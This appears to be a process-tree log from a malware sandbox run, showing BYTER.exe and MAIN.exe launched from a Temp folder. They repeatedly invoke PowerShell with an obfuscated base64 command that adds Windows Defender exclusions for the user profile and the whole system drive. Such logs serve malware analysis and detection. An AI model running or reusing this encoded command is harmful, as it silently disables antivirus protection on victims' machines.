C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "464246134-516785921-1804402230-1075254709-670951212192293366716143279881461977868"

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1630216740-270672682-13908016851087346497-8557197681493966897845646012-1523906610"

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "40315970526016847686875520-2052835158-1570726529-1043843204-1332126734-307665969"

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "9552789131872800189-1467004871-643479173604001312110694821-571614181204897437"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

